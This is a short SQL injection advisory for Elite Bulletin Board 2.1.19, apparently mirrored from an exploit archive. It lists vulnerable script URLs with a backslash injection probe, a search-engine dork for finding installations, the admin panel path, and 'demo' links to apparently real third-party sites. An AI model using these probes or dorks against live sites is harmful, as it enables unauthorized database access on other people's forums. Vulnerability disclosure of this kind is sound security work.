Elite Bulletin Board version 2.1.19 suffers from a remote SQL injection vulnerability.
38ceedd2da888919b9e4f13ce5a14bd3fb372a6bf5708329aa373a96263aba8f#### # Exploit Title: Elite Bulletin Board SQL Injection Vulnerability
# Author: T0x!c
# Date : 15/07/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: intext:"Powered by: Elite Bulletin Board "
# Download: http://elite-board.us/
# Version: 2.1.19
# Tested on: [Windows Xp]
####
||Im Back||
[ Vulnerable File ]
=>http://127.0.0.1/ebbv2/groups.php?id=%5c&mode=view
=>http://127.0.0.1/ebbv2/rssfeed.php?bid=%5c
=>http://127.0.0.1/ebbv2/viewboard.php?bid=%5c
# Demo :
http://4u2njoy.zxq.net/ebbv2/rssfeed.php?bid=\
http://www.academyacl.org/bb/groups.php?id=\&mode=view
http://myviralc.sc23.info/links/board/viewboard.php?bid=\
# Admin Panel:
=>http://127.0.0.1/ebbv2/acp/
=================================**AlgeriansHackers**========================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Wahson * Amine Msd * Kalashinkov * Bpsw *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz) ,(dz-root.com)
=============================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed